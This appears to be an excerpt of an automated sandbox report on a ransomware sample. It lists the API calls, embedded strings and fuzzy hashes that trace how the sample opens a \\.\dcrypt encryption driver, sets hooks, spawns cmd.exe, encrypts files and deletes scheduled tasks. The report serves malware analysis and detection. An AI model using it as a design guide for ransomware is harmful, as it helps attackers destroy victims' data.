                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                                                      • String ID: ($@
                                                                      • API String ID: 3079641271-1311469180
                                                                      • Opcode ID: 1575ba47818ea86ccc582740dda8321a556e0ec5cf78281496197117b34d609a
                                                                      • Instruction ID: 63ac78d155f4a00c51b85a2a3803f609f85b09698dc059ce2cda0e4b1a32c0ff
                                                                      • Opcode Fuzzy Hash: 1575ba47818ea86ccc582740dda8321a556e0ec5cf78281496197117b34d609a
                                                                      • Instruction Fuzzy Hash: 55519875C012199FDB15AFB1ED4CAD9BBB8FB08301F008599E54AA7260DB759AC8CF60

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00DF517C
                                                                      • CoCreateInstance.COMBASE(00E03328,00000000,00000001,00E03318,?), ref: 00DF519F
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00DF51BB
                                                                      • GetVersion.KERNEL32 ref: 00DF520A
                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000410), ref: 00DF5233
                                                                      • Sleep.KERNELBASE(00001388), ref: 00DF528A
                                                                      • CoUninitialize.COMBASE ref: 00DF52AE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CreateEnvironmentExpandFileInitializeInstanceModuleNameSleepStringsUninitializeVersion
                                                                      • String ID: %ALLUSERSPROFILE%$%PUBLIC%$DECRYPT$\Desktop\DECRYPT.lnk
                                                                      • API String ID: 3778704366-674991135
                                                                      • Opcode ID: ba7571a33a32cb02355bfe230dab2c0f357fb3649ee85927f9dc3e49e50c865f
                                                                      • Instruction ID: 049434f915f8084eb2a19a9aa991d3938fc167147d69e11ef16cfa292ff06e97
                                                                      • Opcode Fuzzy Hash: ba7571a33a32cb02355bfe230dab2c0f357fb3649ee85927f9dc3e49e50c865f
                                                                      • Instruction Fuzzy Hash: E1417135701718AFDB10DBA4DC85FAA73B9FF89700F108194F60AAB294D671AE85CF61

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,00002000,00003000,00000040), ref: 00DF42CD
                                                                        • Part of subcall function 00DF2020: TlsGetValue.KERNEL32(?), ref: 00DF202B
                                                                        • Part of subcall function 00DF2020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • VirtualLock.KERNEL32(?,00002000), ref: 00DF4307
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4337
                                                                      • SetWindowsHookExW.USER32(00000007,Function_00003F00,00000000,00000000), ref: 00DF4349
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4350
                                                                      • SetWindowsHookExW.USER32(00000002,Function_00003FC0,00000000,00000000), ref: 00DF435C
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 00DF4378
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 00DF438B
                                                                      • CryptGenRandom.ADVAPI32(?,00000200,?), ref: 00DF43A8
                                                                      • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00DF440F
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$AcquireCurrentHookThreadVirtualWindows$AllocCreateFileLockRandomReleaseValue
                                                                      • String ID:
                                                                      • API String ID: 330245633-0
                                                                      • Opcode ID: 7aaa45c15a6e486a5fc2a9f718b441676b81cdd4972318e24b59846cd439d5e0
                                                                      • Instruction ID: 2879beba17d6eeac076084292b54c3b1cb41e036abecdfb91ef5dda782fe888e
                                                                      • Opcode Fuzzy Hash: 7aaa45c15a6e486a5fc2a9f718b441676b81cdd4972318e24b59846cd439d5e0
                                                                      • Instruction Fuzzy Hash: D641B770A4031CAEE7209B65DC49FAB77B8EB14700F154165E605FB1D1DAB1A9848BB1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF202B
                                                                      • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF2062
                                                                      • DeviceIoControl.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00DF2083
                                                                      • GetLastError.KERNEL32 ref: 00DF208D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlCreateDeviceErrorFileLast
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 2163648868-1945893055
                                                                      • Opcode ID: b0c73a515ff696a1a7e4edeee4d3c87568691adc1fdab9ba966115f47bbb8407
                                                                      • Instruction ID: ba32785b34a233cc42204ada7f03d58ec65eb77b37a6dcacded525b3ea3920f8
                                                                      • Opcode Fuzzy Hash: b0c73a515ff696a1a7e4edeee4d3c87568691adc1fdab9ba966115f47bbb8407
                                                                      • Instruction Fuzzy Hash: 1E015272601619BFD710DF69EC49EBB3B9CEB48761F004245FD09E3240DA629D4487F0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00DF440F
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ContextControlCreateCryptDeviceErrorFileLastRelease
                                                                      • String ID:
                                                                      • API String ID: 3296926122-0
                                                                      • Opcode ID: e0bcc7fd974efaaf1ec2130afbc4169c88677baf7bad778e066ce415fda5a21e
                                                                      • Instruction ID: 80868da62797e0034491c7cb68600862e2bb67b78c4330b428fc0730db3ab617
                                                                      • Opcode Fuzzy Hash: e0bcc7fd974efaaf1ec2130afbc4169c88677baf7bad778e066ce415fda5a21e
                                                                      • Instruction Fuzzy Hash: C7F0C23050424C8FD711AF64EC4836B77A4EB10300F0A45A8D696D7266CA305C8187A1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00DF3E1A
                                                                      • GetClientRect.USER32 ref: 00DF3E3D
                                                                      • GetWindowRect.USER32(?,?), ref: 00DF3E49
                                                                      • GetWindowInfo.USER32(?,?), ref: 00DF3E55
                                                                      • GetGUIThreadInfo.USER32(?,?), ref: 00DF3E65
                                                                      • GetWindowTextW.USER32(?,?,00000104), ref: 00DF3E79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Window$InfoRectThread$ClientProcessText
                                                                      • String ID: 0$<
                                                                      • API String ID: 2833114922-95265187
                                                                      • Opcode ID: 819183c6fdaabc36fc0558026f3a6a9e219ecedcd3d26d34cfd2d8b39cabcb18
                                                                      • Instruction ID: 6bda1fa7686fb71aa4d2dad0b6618334de4bb135f3fc44f5712743b212baa67f
                                                                      • Opcode Fuzzy Hash: 819183c6fdaabc36fc0558026f3a6a9e219ecedcd3d26d34cfd2d8b39cabcb18
                                                                      • Instruction Fuzzy Hash: 6F218F71104349AFD320EF64DC84AABB7E8FF85300F05491DF58597260DB719A4DCBA2

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                      • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                      • lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                      • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryEnvironmentProcessSystemVariable_vswprintf_slstrcat
                                                                      • String ID: /c %ws$ComSpec$D$\cmd.exe
                                                                      • API String ID: 306406079-851825698
                                                                      • Opcode ID: 7075bdd1eb614c1e47b36aa6ba57b791369f7d922d6ec3523e49bd9c1beb4ec4
                                                                      • Instruction ID: 380e11c1fa2ec32169c261c0b539a09ab30598978d72aacb033b0cdc1caa7cf7
                                                                      • Opcode Fuzzy Hash: 7075bdd1eb614c1e47b36aa6ba57b791369f7d922d6ec3523e49bd9c1beb4ec4
                                                                      • Instruction Fuzzy Hash: 52219571A0074CAFEB10DB60DC45BB977BDDB58700F404599A709BB1C0EAB1AE888F64

Control-flow Graph

APIs
  • Part of subcall function 00DF52D0: GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00DF52DF
  • Part of subcall function 00DF52D0: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5301
  • Part of subcall function 00DF52D0: CloseHandle.KERNEL32(00000000), ref: 00DF5309
  • Part of subcall function 00DF52D0: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5320
  • Part of subcall function 00DF52D0: TlsSetValue.KERNEL32(?,00000000), ref: 00DF532E
  • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
  • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
  • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
  • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
  • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
• CreateEventW.KERNEL32(?,00000001,?,?), ref: 00DF5704
• SetConsoleCtrlHandler.KERNEL32(Function_00005620,00000001), ref: 00DF5716
• WaitForSingleObject.KERNEL32(?,00000000), ref: 00DF574E
• Sleep.KERNEL32(00001388), ref: 00DF5762
Similarity
• API ID: Create$File$AttributesCloseConsoleCtrlDirectoryEnvironmentEventHandleHandlerObjectProcessSingleSleepSystemValueVariableWait_vswprintf_slstrcat
• String ID: -id$rhaegal$schtasks /Delete /F /TN %ws
• API String ID: 2413411667-2713465884
• Opcode ID: 56b6abe943760310e7989bfd08224f813eef24835e0b7cb7239f3ddb32fdf12e
• Instruction ID: 9a690ca7698b9cd0c3d179b0a9edb277cbc40815b0f138cfb956e94084061768
• Instruction Fuzzy Hash: B2313970A0070CABEB20BB70BC4ABBA3765DB11704F56C454F715A72DADA71DD888770

Control-flow Graph

APIs
• GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00DF52DF
• CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5301
• CloseHandle.KERNEL32(00000000), ref: 00DF5309
• CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5320
• TlsSetValue.KERNEL32(?,00000000), ref: 00DF532E
  • Part of subcall function 00DF47E0: FindFirstVolumeW.KERNEL32(?,00000104), ref: 00DF4802
  • Part of subcall function 00DF47E0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00DF4889
  • Part of subcall function 00DF47E0: GetLastError.KERNEL32 ref: 00DF488B
Similarity
• API ID: File$CreateFindVolume$AttributesCloseErrorFirstHandleLastNextValue
• String ID: C:\Windows\cscc.dat$\\.\dcrypt
• API String ID: 893940839-3761405209
• Opcode ID: 81ca6280c54cb63e723e00a8284253aadea7060e9d2aded2bb9c3b12f9ba0e78
• Instruction ID: f046bd865306fc16706ee9fe70d293c078f8690734da51ca004c0ac476cb34bb
• Instruction Fuzzy Hash: C701F7313C1B083AE22017797C1FF6636889B05B20F795311B724FB0E0DAD2A5894B79

Control-flow Graph

APIs
• TlsGetValue.KERNEL32(?), ref: 00DF3D19
• CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
• TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
• DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
• GetLastError.KERNEL32 ref: 00DF3D68
Similarity
• API ID: Value$ControlCreateDeviceErrorFileLast
• String ID: \\.\dcrypt
• API String ID: 2163648868-1945893055
• Opcode ID: 943e40dae523331f55cb3fea837b33222097b44cc713200fc8c006fbce36df04
• Instruction ID: b8034cf34364874bf3749e460edf701cf60a7081f9aa03e09e4ce53587af90d2
• Instruction Fuzzy Hash: C401B572602318BFE6209B6BAC48F773B6CE749720F164119FA00F72D0C6729E8487B1

Control-flow Graph

APIs
• TlsGetValue.KERNEL32(?,00220040,?,00000298,?,00000298,?,00000000), ref: 00DF224F
• DeviceIoControl.KERNELBASE(00000000), ref: 00DF2256
Similarity
• API ID: ControlDeviceValue
• String ID:
• API String ID: 4261377879-0
• Opcode ID: 70af6b64aa69526846bf18adf048df0e369901ef8754c7c01fddbfabaf3f7cd3
• Instruction ID: 1575565ca19dc3975f71e8eb9c9b719c31c296c4d0f10e16f3b34cddaf0a00f3
• Instruction Fuzzy Hash: 4D110631B002189BDB14DBB4DC06BBA73B8EF49300F4585ADE90AE7280EE759E44C764

Control-flow Graph

APIs
• ___crtCorExitProcess.LIBCMT ref: 00DF7D14
  • Part of subcall function 00DF7CE1: GetModuleHandleW.KERNEL32(mscoree.dll,?,00DF7D19,?,?,00DF5EB5,000000FF,0000001E,00000001,00000000,00000000,?,00DFB13B,?,00000001,?), ref: 00DF7CEB
  • Part of subcall function 00DF7CE1: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DF7CFB
• ExitProcess.KERNEL32 ref: 00DF7D1D
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
• Opcode ID: e06733b35ec2e67cee95350cb471306b397d2044370bbf4d4c10b39a060c329a
• Instruction ID: a9289a0e1b06a63dfa981d72132e71427958f5b99770754c563471b1295f6c7f
• Instruction Fuzzy Hash: 1CB09B3100410C7FCB012F12DC0A8593F19EB40750B114010F51415031DF72DDD29590

Control-flow Graph

APIs
• EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF427D
  • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
  • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
  • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
  • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
  • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
Similarity
• API ID: Value$ControlCreateDeviceEnumErrorFileLastWindows
• String ID:
• API String ID: 1452533794-0
• Opcode ID: 1b2889faf86f069fde08161205120114adecf6f274e00193085c0f106132c745
• Instruction ID: ea3fcdd449602ac31cc91e69abc7e216707c3851631fec49587326f51f621d1f
• Instruction Fuzzy Hash: 0CF0BB3050024C8EDB15EF60FC857F93760FB19304F0780BCEA469B155DA211D898BB1

Control-flow Graph

APIs
• _doexit.LIBCMT ref: 00DF7F70
  • Part of subcall function 00DF7E24: __lock.LIBCMT ref: 00DF7E32
  • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL(00E05CF0), ref: 00DF7E6E
  • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL ref: 00DF7E7F
  • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL(-00000004), ref: 00DF7EA5
  • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL ref: 00DF7EB8
  • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL ref: 00DF7EC2
Similarity
• API ID: DecodePointer$__lock_doexit
• String ID:
• API String ID: 3343572566-0
• Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
• Instruction ID: a292a6d30d0570b4e35ff3e132693af6b897997cc2eeae3948082f9a387278de
• Instruction Fuzzy Hash: E4B0923298420C33DA202542AC03F5A3A4987C1B60E2540A1FB0C191A1A9A2AD6580A9
APIs
  • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
  • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
  • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
  • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
• CloseHandle.KERNEL32(7269DA46), ref: 00DF2A65
• _free.LIBCMT ref: 00DF2A6C
• _free.LIBCMT ref: 00DF2A7F
Similarity
• API ID: _free$CloseCreateFileHandle__snwprintf_malloc
• String ID: $@$EXEFILE
• API String ID: 798375799-665770621
• Opcode ID: 7590244b2cfdf6bdfe3bd953592a3e2a136ce42379408a1d65e40c50a1b1f1ac
• Instruction ID: 39d852d7881233d6ad3b10679e14dac51f0d9e408e3a62b2dc34cefc423142ab
• Instruction Fuzzy Hash: 3AE1B6B1E0121C8BDB30DF64CC857BA77B5EB84350F1BC1A9EB09A7245D6719E818BB4
                                                                      APIs
                                                                      • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?), ref: 00DF1A11
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF1A2E
                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00DF1A71
                                                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,?,00000000), ref: 00DF1AB3
                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,?), ref: 00DF1ACA
                                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00DF1AE7
                                                                      • FlushViewOfFile.KERNEL32(00000000,?), ref: 00DF1AF6
                                                                      • _wprintf.LIBCMT ref: 00DF1B05
                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00DF1B0E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DF1B15
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DF1B46
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 00DF1B50
                                                                      • SetEvent.KERNEL32(?), ref: 00DF1B6A
                                                                      • SetEvent.KERNEL32(?), ref: 00DF1B74
                                                                        • Part of subcall function 00DF1810: CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00DF18D9
                                                                        • Part of subcall function 00DF1810: CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00DF18F3
                                                                        • Part of subcall function 00DF1810: LocalAlloc.KERNEL32(00000040,?), ref: 00DF190A
                                                                        • Part of subcall function 00DF1810: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00DF1927
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CryptFile$HashView$CloseCreateDuplicateEventHandle$AllocDataDecryptDestroyFlushLocalMappingParamSizeUnmap_wprintf
                                                                      • String ID: %lS OK
                                                                      • API String ID: 2843717376-683714924
                                                                      • Opcode ID: 056396a027421afce76013057b2e9b0c68f2a454d5b50e0dd3e4371e989a1ee5
                                                                      • Instruction ID: f088b77c1c6567bc81bb8ffc6ea2126afb8c671065a0033670414c2e52a5cc0d
                                                                      • Opcode Fuzzy Hash: 056396a027421afce76013057b2e9b0c68f2a454d5b50e0dd3e4371e989a1ee5
                                                                      • Instruction Fuzzy Hash: 6F516C79A00219FFEB10DFA5CC84ABEB77DEB48340F158119FA15A7240E771AE458BB0
                                                                      APIs
                                                                        • Part of subcall function 00DF1710: GetFileSizeEx.KERNEL32(?,?), ref: 00DF1723
                                                                        • Part of subcall function 00DF1710: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00DF1744
                                                                        • Part of subcall function 00DF1710: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00DF175D
                                                                        • Part of subcall function 00DF1710: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00DF1779
                                                                      • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00DF18D9
                                                                      • CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00DF18F3
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00DF190A
                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00DF1927
                                                                      • LocalFree.KERNEL32(00000000), ref: 00DF19AE
                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00DF19B8
                                                                      • LocalFree.KERNEL32(?), ref: 00DF19C2
                                                                      • LocalFree.KERNEL32(?), ref: 00DF19DD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Local$CryptHash$FileFree$Alloc$DataDestroyDuplicateParamPointerReadSize
                                                                      • String ID: encrypted
                                                                      • API String ID: 1377777459-1467498611
                                                                      • Opcode ID: 90516eaf2560bed8c3c3ecad894892bfd66ec9409cf3426ec2fed2774a6e9330
                                                                      • Instruction ID: c0d6033374113260196bc3adb8277a4b3a7cc432382c850f4cc01dbd922055e7
                                                                      • Opcode Fuzzy Hash: 90516eaf2560bed8c3c3ecad894892bfd66ec9409cf3426ec2fed2774a6e9330
                                                                      • Instruction Fuzzy Hash: 76514679A00119EBDB24DF79C89077DBFB5AF45300F1DC195EA95DB241C632DE409BA0
                                                                      APIs
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00DF1E4C
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00DF1E77
                                                                      • GetLastError.KERNEL32 ref: 00DF1E7D
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00DF1E93
                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 00DF1ED6
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 00DF1EE0
                                                                      • CryptDestroyKey.ADVAPI32 ref: 00DF1EE9
